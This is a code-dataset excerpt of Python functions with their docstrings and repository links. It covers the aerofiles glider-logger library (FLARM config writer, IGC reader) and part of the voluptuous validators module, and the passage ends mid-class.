Turbo87/aerofiles | aerofiles/flarmcfg/writer.py | Writer.write_waypoint | python | def write_waypoint(self, latitude=None, longitude=None, description=None):
if not description:
description = ''
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
self.write_config(
'ADDWP', '%s,%s,%s' % (latitude, longitude, description[0:50])
) | Adds a waypoint to the current task declaration. The first and the
last waypoint added will be treated as takeoff and landing location,
respectively.
::
writer.write_waypoint(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> $PFLAC,S,ADDWP,5107345N,00624765E,Meiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for takeoff and landing points.
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param description: arbitrary text description of waypoint | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/flarmcfg/writer.py#L150-L182 | [
"def format_latitude(self, value):\n return self.format_coordinate(\n value, default='0000000N', is_latitude=True)\n",
"def format_longitude(self, value):\n return self.format_coordinate(\n value, default='00000000E', is_latitude=False)\n",
"def write_config(self, key, value):\n self.writ... | class Writer:
"""
A writer for the Flarm configuration file format::
with open('flarmcfg.txt', 'w') as fp:
writer = Writer(fp)
see `FTD-14 FLARM Configuration Specification
<http://flarm.com/support/manuals-documents/>`_ and
annotated example `flarmcfg.txt
<http://www.ftv-spandau.de/streckenfluege/flarm-informationen/flarmcfg.txt>`_
"""
def __init__(self, fp=None):
self.fp = fp
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_config(self, key, value):
self.write_line('$PFLAC,S,%s,%s' % (key, value))
def write_pilot(self, pilot):
"""
Write the pilot name configuration::
writer.write_pilot('Tobias Bieniek')
# -> $PFLAC,S,PILOT,Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_config('PILOT', pilot)
def write_copilot(self, copilot):
"""
Write the copilot name configuration::
writer.write_copilot('John Doe')
# -> $PFLAC,S,COPIL,John Doe
:param copilot: name of the copilot
"""
self.write_config('COPIL', copilot)
def write_glider_type(self, glider_type):
"""
Write the glider type configuration::
writer.write_glider_type('Hornet')
# -> $PFLAC,S,GLIDERTYPE,Hornet
:param glider_type: the type of glider
"""
self.write_config('GLIDERTYPE', glider_type)
def write_glider_id(self, glider_id):
"""
Write the glider registration configuration::
writer.write_glider_id('D-4449')
# -> $PFLAC,S,GLIDERID,D-4449
:param glider_id: the registration of the glider
"""
self.write_config('GLIDERID', glider_id)
def write_competition_id(self, competition_id):
"""
Write the competition id configuration::
writer.write_competition_id('TH')
# -> $PFLAC,S,COMPID,TH
:param competition_id: competition id of the glider
"""
self.write_config('COMPID', competition_id)
def write_competition_class(self, competition_class):
"""
Write the competition class configuration::
writer.write_competition_class('Club')
# -> $PFLAC,S,COMPCLASS,Club
:param competition_class: competition class of the glider
"""
self.write_config('COMPCLASS', competition_class)
def write_logger_interval(self, interval):
"""
Write the logger interval configuration::
writer.write_logger_interval(4)
# -> $PFLAC,S,LOGINT,4
:param interval: competition class of the glider
"""
self.write_config('LOGINT', str(interval))
def write_task_declaration(self, description=None):
"""
Start a new task declaration. Any old task declaration will be cleared
by this command::
writer.write_task_declaration('My Task')
# -> $PFLAC,S,NEWTASK,My Task
:param description: optional text description of task, e.g.
"500km triangle"; can be an empty string; will be trimmed to
50 characters
"""
if not description:
description = ''
self.write_config('NEWTASK', description[0:50])
def write_waypoints(self, points):
"""
Write multiple task declaration points with one call::
writer.write_waypoints([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2'),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> $PFLAC,S,ADDWP,0000000N,00000000E,TAKEOFF
# -> $PFLAC,S,ADDWP,5124225N,00624765E,START
# -> $PFLAC,S,ADDWP,5022926N,00849263E,TURN 1
# -> $PFLAC,S,ADDWP,5035427N,00702133E,TURN 2
# -> $PFLAC,S,ADDWP,5124225N,00624765E,FINISH
# -> $PFLAC,S,ADDWP,0000000N,00000000E,LANDING
see the :meth:`~aerofiles.flarmcfg.Writer.write_waypoint` method for
more information.
:param points: a list of ``(latitude, longitude, text)`` tuples.
"""
for args in points:
if len(args) != 3:
raise ValueError('Invalid number of task point tuple items')
self.write_waypoint(*args)
|
Turbo87/aerofiles | aerofiles/flarmcfg/writer.py | Writer.write_waypoints | python | def write_waypoints(self, points):
for args in points:
if len(args) != 3:
raise ValueError('Invalid number of task point tuple items')
self.write_waypoint(*args) | Write multiple task declaration points with one call::
writer.write_waypoints([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2'),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> $PFLAC,S,ADDWP,0000000N,00000000E,TAKEOFF
# -> $PFLAC,S,ADDWP,5124225N,00624765E,START
# -> $PFLAC,S,ADDWP,5022926N,00849263E,TURN 1
# -> $PFLAC,S,ADDWP,5035427N,00702133E,TURN 2
# -> $PFLAC,S,ADDWP,5124225N,00624765E,FINISH
# -> $PFLAC,S,ADDWP,0000000N,00000000E,LANDING
see the :meth:`~aerofiles.flarmcfg.Writer.write_waypoint` method for
more information.
:param points: a list of ``(latitude, longitude, text)`` tuples. | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/flarmcfg/writer.py#L184-L212 | [
"def write_waypoint(self, latitude=None, longitude=None, description=None):\n \"\"\"\n Adds a waypoint to the current task declaration. The first and the\n last waypoint added will be treated as takeoff and landing location,\n respectively.\n\n ::\n\n writer.write_waypoint(\n latitu... | class Writer:
"""
A writer for the Flarm configuration file format::
with open('flarmcfg.txt', 'w') as fp:
writer = Writer(fp)
see `FTD-14 FLARM Configuration Specification
<http://flarm.com/support/manuals-documents/>`_ and
annotated example `flarmcfg.txt
<http://www.ftv-spandau.de/streckenfluege/flarm-informationen/flarmcfg.txt>`_
"""
def __init__(self, fp=None):
self.fp = fp
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_config(self, key, value):
self.write_line('$PFLAC,S,%s,%s' % (key, value))
def write_pilot(self, pilot):
"""
Write the pilot name configuration::
writer.write_pilot('Tobias Bieniek')
# -> $PFLAC,S,PILOT,Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_config('PILOT', pilot)
def write_copilot(self, copilot):
"""
Write the copilot name configuration::
writer.write_copilot('John Doe')
# -> $PFLAC,S,COPIL,John Doe
:param copilot: name of the copilot
"""
self.write_config('COPIL', copilot)
def write_glider_type(self, glider_type):
"""
Write the glider type configuration::
writer.write_glider_type('Hornet')
# -> $PFLAC,S,GLIDERTYPE,Hornet
:param glider_type: the type of glider
"""
self.write_config('GLIDERTYPE', glider_type)
def write_glider_id(self, glider_id):
"""
Write the glider registration configuration::
writer.write_glider_id('D-4449')
# -> $PFLAC,S,GLIDERID,D-4449
:param glider_id: the registration of the glider
"""
self.write_config('GLIDERID', glider_id)
def write_competition_id(self, competition_id):
"""
Write the competition id configuration::
writer.write_competition_id('TH')
# -> $PFLAC,S,COMPID,TH
:param competition_id: competition id of the glider
"""
self.write_config('COMPID', competition_id)
def write_competition_class(self, competition_class):
"""
Write the competition class configuration::
writer.write_competition_class('Club')
# -> $PFLAC,S,COMPCLASS,Club
:param competition_class: competition class of the glider
"""
self.write_config('COMPCLASS', competition_class)
def write_logger_interval(self, interval):
"""
Write the logger interval configuration::
writer.write_logger_interval(4)
# -> $PFLAC,S,LOGINT,4
:param interval: competition class of the glider
"""
self.write_config('LOGINT', str(interval))
def write_task_declaration(self, description=None):
"""
Start a new task declaration. Any old task declaration will be cleared
by this command::
writer.write_task_declaration('My Task')
# -> $PFLAC,S,NEWTASK,My Task
:param description: optional text description of task, e.g.
"500km triangle"; can be an empty string; will be trimmed to
50 characters
"""
if not description:
description = ''
self.write_config('NEWTASK', description[0:50])
def write_waypoint(self, latitude=None, longitude=None, description=None):
"""
Adds a waypoint to the current task declaration. The first and the
last waypoint added will be treated as takeoff and landing location,
respectively.
::
writer.write_waypoint(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> $PFLAC,S,ADDWP,5107345N,00624765E,Meiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for takeoff and landing points.
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param description: arbitrary text description of waypoint
"""
if not description:
description = ''
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
self.write_config(
'ADDWP', '%s,%s,%s' % (latitude, longitude, description[0:50])
)
|
Turbo87/aerofiles | aerofiles/igc/reader.py | Reader.read | python | def read(self, file_obj):
self.reader = LowLevelReader(file_obj)
logger_id = [[], None]
fix_records = [[], []]
task = [[], {"waypoints": []}]
dgps_records = [[], []]
event_records = [[], []]
satellite_records = [[], []]
security_records = [[], []]
header = [[], {}]
fix_record_extensions = [[], []]
k_record_extensions = [[], []]
k_records = [[], []]
comment_records = [[], []]
for record_type, line, error in self.reader:
if record_type == 'A':
if error:
logger_id[0].append(error)
else:
logger_id[1] = line
elif record_type == 'B':
if error:
if MissingRecordsError not in fix_records[0]:
fix_records[0].append(MissingRecordsError)
else:
# add MissingExtensionsError when fix_record_extensions contains error
if len(fix_record_extensions[0]) > 0 and MissingExtensionsError not in fix_records[0]:
fix_records[0].append(MissingExtensionsError)
fix_record = LowLevelReader.process_B_record(line, fix_record_extensions[1])
fix_records[1].append(fix_record)
elif record_type == 'C':
task_item = line
if error:
if MissingRecordsError not in task[0]:
task[0].append(MissingRecordsError)
else:
if task_item['subtype'] == 'task_info':
del task_item['subtype']
task[1].update(task_item)
elif task_item['subtype'] == 'waypoint_info':
del task_item['subtype']
task[1]['waypoints'].append(task_item)
elif record_type == 'D':
if error:
if MissingRecordsError not in dgps_records[0]:
dgps_records[0].append(MissingRecordsError)
else:
dgps_records[1].append(line)
elif record_type == 'E':
if error:
if MissingRecordsError not in event_records[0]:
event_records[0].append(MissingRecordsError)
else:
event_records[1].append(line)
elif record_type == 'F':
if error:
if MissingRecordsError not in satellite_records[0]:
satellite_records[0].append(MissingRecordsError)
else:
satellite_records[1].append(line)
elif record_type == 'G':
if error:
if MissingRecordsError not in security_records[0]:
security_records[0].append(MissingRecordsError)
else:
security_records[1].append(line)
elif record_type == 'H':
header_item = line
if error:
if MissingRecordsError not in header[0]:
header[0].append(MissingRecordsError)
else:
del header_item['source']
header[1].update(header_item)
elif record_type == 'I':
if error:
fix_record_extensions[0].append(error)
else:
fix_record_extensions[1] = line
elif record_type == 'J':
if error:
k_record_extensions[0].append(error)
else:
k_record_extensions[1] = line
elif record_type == 'K':
if error:
if MissingRecordsError not in k_records[0]:
k_records[0].append(MissingRecordsError)
else:
# add MissingExtensionsError when fix_record_extensions contains error
if len(k_record_extensions[0]) > 0 and MissingExtensionsError not in k_records[0]:
k_records[0].append(MissingExtensionsError)
k_record = LowLevelReader.process_K_record(line, k_record_extensions[1])
k_records[1].append(k_record)
elif record_type == 'L':
if error:
if MissingRecordsError not in comment_records[0]:
comment_records[0].append(MissingRecordsError)
else:
comment_records[1].append(line)
return dict(logger_id=logger_id, # A record
fix_records=fix_records, # B records
task=task, # C records
dgps_records=dgps_records, # D records
event_records=event_records, # E records
satellite_records=satellite_records, # F records
security_records=security_records, # G records
header=header, # H records
fix_record_extensions=fix_record_extensions, # I records
k_record_extensions=k_record_extensions, # J records
k_records=k_records, # K records
comment_records=comment_records, # L records
) | Read the specified file object and return a dictionary with the parsed data.
:param file_obj: a Python file object | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/reader.py#L20-L149 | [
"def process_B_record(decoded_b_record, fix_record_extensions):\n\n i = decoded_b_record['start_index_extensions']\n ext = decoded_b_record['extensions_string']\n\n b_record = decoded_b_record\n del b_record['start_index_extensions']\n del b_record['extensions_string']\n\n for extension in fix_rec... | class Reader:
"""
A reader for the IGC flight log file format.
Example:
.. sourcecode:: python
>>> with open('track.igc', 'r') as f:
... parsed = Reader().read(f)
"""
def __init__(self):
self.reader = None
|
alecthomas/voluptuous | voluptuous/validators.py | truth | python | def truth(f):
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check | Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir') | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L44-L64 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
class Coerce(object):
    """Coerce a value to a type.

    If the type constructor throws a ValueError or TypeError, the value
    will be marked as Invalid.

    Default behavior:

    >>> validate = Schema(Coerce(int))
    >>> with raises(MultipleInvalid, 'expected int'):
    ...   validate(None)
    >>> with raises(MultipleInvalid, 'expected int'):
    ...   validate('foo')

    With custom message:

    >>> validate = Schema(Coerce(int, "moo"))
    >>> with raises(MultipleInvalid, 'moo'):
    ...   validate('foo')
    """

    def __init__(self, type, msg=None):
        # Keep the callable plus a human-readable name for error messages.
        self.type = type
        self.type_name = type.__name__
        self.msg = msg

    def __call__(self, v):
        try:
            return self.type(v)
        except (ValueError, TypeError, InvalidOperation):
            error_message = self.msg if self.msg else 'expected %s' % self.type_name
            raise CoerceInvalid(error_message)

    def __repr__(self):
        return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
    """Assert that a value is true, in the Python sense.

    >>> validate = Schema(IsTrue())

    "In the Python sense" means that implicitly false values, such as empty
    lists, dictionaries, etc. are treated as "false":

    >>> with raises(MultipleInvalid, "value was not true"):
    ...   validate([])
    >>> validate([1])
    [1]
    >>> with raises(MultipleInvalid, "value was not true"):
    ...   validate(False)

    ...and so on.

    >>> try:
    ...   validate([])
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], TrueInvalid)
    """
    # @truth raises ValueError when bool(v) is false; the value itself is
    # passed through unchanged on success.
    return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
    """Assert that a value is false, in the Python sense.

    (see :func:`IsTrue` for more detail)

    >>> validate = Schema(IsFalse())
    >>> validate([])
    []
    >>> with raises(MultipleInvalid, "value was not false"):
    ...   validate(True)

    >>> try:
    ...   validate(True)
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], FalseInvalid)
    """
    # Accept only falsy values; anything truthy is rejected.
    if not v:
        return v
    raise ValueError
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
    """Convert human-readable boolean values to a bool.

    Accepted values are 1, true, yes, on, enable, and their negatives.
    Non-string values are cast to bool.

    >>> validate = Schema(Boolean())
    >>> validate(True)
    True
    >>> validate("1")
    True
    >>> validate("0")
    False
    >>> with raises(MultipleInvalid, "expected boolean"):
    ...   validate('moo')
    >>> try:
    ...   validate('moo')
    ... except MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], BooleanInvalid)
    """
    if isinstance(v, basestring):
        normalized = v.lower()
        if normalized in ('1', 'true', 'yes', 'on', 'enable'):
            return True
        elif normalized in ('0', 'false', 'no', 'off', 'disable'):
            return False
        # Any other string is not a recognized boolean spelling.
        raise ValueError
    return bool(v)
class _WithSubValidators(object):
    """Base class for validators that use sub-validators.

    Special class to use as a parent class for validators using sub-validators.
    This class provides the `__voluptuous_compile__` method so the
    sub-validators are compiled by the parent `Schema`.

    Subclasses must implement ``_exec(funcs, v, path=None)``.
    """

    def __init__(self, *validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        self.required = kwargs.pop('required', False)

    def __voluptuous_compile__(self, schema):
        # Compile each sub-validator with the parent schema so nested
        # schemas pick up its ``required`` setting.
        self._compiled = []
        for v in self.validators:
            schema.required = self.required
            self._compiled.append(schema._compile(v))
        return self._run

    def _run(self, path, value):
        # Entry point invoked by the compiled parent schema.
        return self._exec(self._compiled, value, path)

    def __call__(self, v):
        # Standalone use (outside a compiled Schema): wrap each
        # sub-validator in its own Schema on the fly.
        return self._exec((Schema(val) for val in self.validators), v)

    def __repr__(self):
        return '%s(%s, msg=%r)' % (
            self.__class__.__name__,
            ", ".join(repr(v) for v in self.validators),
            self.msg
        )
class Any(_WithSubValidators):
    """Use the first validated value.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :returns: Return value of the first validator that passes.

    >>> validate = Schema(Any('true', 'false',
    ...                       All(Any(int, bool), Coerce(bool))))
    >>> validate('true')
    'true'
    >>> validate(1)
    True
    >>> with raises(MultipleInvalid, "not a valid value"):
    ...   validate('moo')

    msg argument is used

    >>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
    >>> validate(1)
    1
    >>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
    ...   validate(4)
    """

    def _exec(self, funcs, v, path=None):
        # Try each sub-validator in turn and return the first success.
        error = None
        for func in funcs:
            try:
                if path is None:
                    return func(v)
                else:
                    return func(path, v)
            except Invalid as e:
                # Keep the "deepest" error (longest path) for reporting.
                if error is None or len(e.path) > len(error.path):
                    error = e
        else:
            # for/else: reached only when no sub-validator succeeded.
            if error:
                raise error if self.msg is None else AnyInvalid(
                    self.msg, path=path)
            raise AnyInvalid(self.msg or 'no valid value found',
                             path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
    """Value must pass all validators.

    The output of each validator is passed as input to the next.

    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.

    >>> validate = Schema(All('10', Coerce(int)))
    >>> validate('10')
    10
    """

    def _exec(self, funcs, v, path=None):
        # Chain the sub-validators: each receives the previous output.
        try:
            for func in funcs:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
        except Invalid as e:
            # Re-raise the original error, or replace it with the custom
            # message when one was given.
            raise e if self.msg is None else AllInvalid(self.msg, path=path)
        return v
# Convenience alias
And = All
class Match(object):
    """Value must be a string that matches the regular expression.

    >>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
    >>> validate('0x123EF4')
    '0x123EF4'
    >>> with raises(MultipleInvalid, "does not match regular expression"):
    ...   validate('123EF4')

    >>> with raises(MultipleInvalid, 'expected string or buffer'):
    ...   validate(123)

    Pattern may also be a compiled regular expression:

    >>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
    >>> validate('0x123ef4')
    '0x123ef4'
    """

    def __init__(self, pattern, msg=None):
        # Accept either a pattern string or an already-compiled pattern.
        self.pattern = re.compile(pattern) if isinstance(pattern, basestring) else pattern
        self.msg = msg

    def __call__(self, v):
        try:
            matched = self.pattern.match(v)
        except TypeError:
            raise MatchInvalid("expected string or buffer")
        if not matched:
            raise MatchInvalid(self.msg or 'does not match regular expression')
        return v

    def __repr__(self):
        return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
    """Regex substitution.

    >>> validate = Schema(All(Replace('you', 'I'),
    ...                       Replace('hello', 'goodbye')))
    >>> validate('you say hello')
    'I say goodbye'
    """

    def __init__(self, pattern, substitution, msg=None):
        # Pattern strings are compiled; compiled patterns are used as-is.
        if isinstance(pattern, basestring):
            self.pattern = re.compile(pattern)
        else:
            self.pattern = pattern
        self.substitution = substitution
        self.msg = msg

    def __call__(self, v):
        return self.pattern.sub(self.substitution, v)

    def __repr__(self):
        return 'Replace(%r, %r, msg=%r)' % (
            self.pattern.pattern, self.substitution, self.msg)
def _url_validation(v):
    # Shared helper for Url/FqdnUrl: parse the value and require both a
    # scheme and a host; returns the parse result for further checks.
    parsed = urlparse.urlparse(v)
    if not parsed.scheme or not parsed.netloc:
        raise UrlInvalid("must have a URL scheme and host")
    return parsed
@message('expected an Email', cls=EmailInvalid)
def Email(v):
    """Verify that the value is an Email or not.

    >>> s = Schema(Email())
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a.com")
    >>> with raises(MultipleInvalid, 'expected an Email'):
    ...   s("a@.com")
    >>> s('t@x.com')
    't@x.com'
    """
    try:
        if not v or "@" not in v:
            raise EmailInvalid("Invalid Email")
        user_part, domain_part = v.rsplit('@', 1)

        if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
            raise EmailInvalid("Invalid Email")
        return v
    except Exception:
        # Was a bare `except:` before, which also swallowed SystemExit and
        # KeyboardInterrupt. Any validation failure (including non-string
        # input) is normalized to ValueError, which the @message decorator
        # reports as 'expected an Email'.
        raise ValueError
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a Fully qualified domain name URL.

    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...   s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        parsed_url = _url_validation(v)
        if "." not in parsed_url.netloc:
            raise UrlInvalid("must have a domain name in URL")
        return v
    except Exception:
        # Was a bare `except:` before, which also swallowed SystemExit and
        # KeyboardInterrupt. Failures are normalized to ValueError for the
        # @message decorator.
        raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.

    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...   s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        _url_validation(v)
        return v
    except Exception:
        # Was a bare `except:` before, which also swallowed SystemExit and
        # KeyboardInterrupt. Failures are normalized to ValueError for the
        # @message decorator.
        raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.

    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...   IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...   IsFile()(None)
    """
    try:
        if v:
            # Coerce path-like values to str before the filesystem check;
            # @truth turns a False result into a validation error.
            v = str(v)
            return os.path.isfile(v)
        else:
            # Falsy input (None, '') is rejected outright.
            raise FileInvalid('Not a file')
    except TypeError:
        raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.

    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...   IsDir()(None)
    """
    try:
        if v:
            # Coerce path-like values to str before the filesystem check;
            # @truth turns a False result into a validation error.
            v = str(v)
            return os.path.isdir(v)
        else:
            # Falsy input (None, '') is rejected outright.
            raise DirInvalid("Not a directory")
    except TypeError:
        raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
    """Verify the path exists, regardless of its type.

    >>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
    True
    >>> with raises(Invalid, 'path does not exist'):
    ...   PathExists()("random_filename_goes_here.py")
    >>> with raises(PathInvalid, 'Not a Path'):
    ...   PathExists()(None)
    """
    try:
        if v:
            # Coerce path-like values to str before the filesystem check;
            # @truth turns a False result into a validation error.
            v = str(v)
            return os.path.exists(v)
        else:
            # Falsy input (None, '') is rejected outright.
            raise PathInvalid("Not a Path")
    except TypeError:
        raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.

    :raises Invalid: if the value does not match the given validator and is
        not None

    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...  s("string")
    """
    # Equivalent to Any(None, validator): None passes immediately,
    # everything else is delegated to the wrapped validator.
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.

    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.

    :raises Invalid: If the value is outside the range.

    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...   s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...   s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...   Schema(Range(max=10, max_included=False))(20)
    """

    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        self.min_included = min_included
        self.max_included = max_included
        self.msg = msg

    def __call__(self, v):
        """Return *v* unchanged if it lies within the configured range."""
        # The negated comparisons (``not v >= ...``) are deliberate: they
        # reject values such as NaN that compare false both ways.
        if self.min is not None:
            if self.min_included:
                if not v >= self.min:
                    raise RangeInvalid(
                        self.msg or 'value must be at least %s' % self.min)
            elif not v > self.min:
                raise RangeInvalid(
                    self.msg or 'value must be higher than %s' % self.min)
        if self.max is not None:
            if self.max_included:
                if not v <= self.max:
                    raise RangeInvalid(
                        self.msg or 'value must be at most %s' % self.max)
            elif not v < self.max:
                raise RangeInvalid(
                    self.msg or 'value must be lower than %s' % self.max)
        return v

    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.

    Either min or max may be omitted.

    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        """Return *v* pulled back inside the configured bounds."""
        if self.min is not None:
            v = max(v, self.min)
        if self.max is not None:
            v = min(v, self.max)
        return v

    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""

    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg

    def __call__(self, v):
        """Return *v* if ``len(v)`` falls within [min, max]."""
        # len() is only evaluated when a bound is configured, so values
        # without a length still pass an unbounded Length().
        too_short = self.min is not None and len(v) < self.min
        if too_short:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        too_long = self.max is not None and len(v) > self.max
        if too_long:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v

    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""

    # strptime format used when none is supplied.
    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'

    def __init__(self, format=None, msg=None):
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg

    def __call__(self, v):
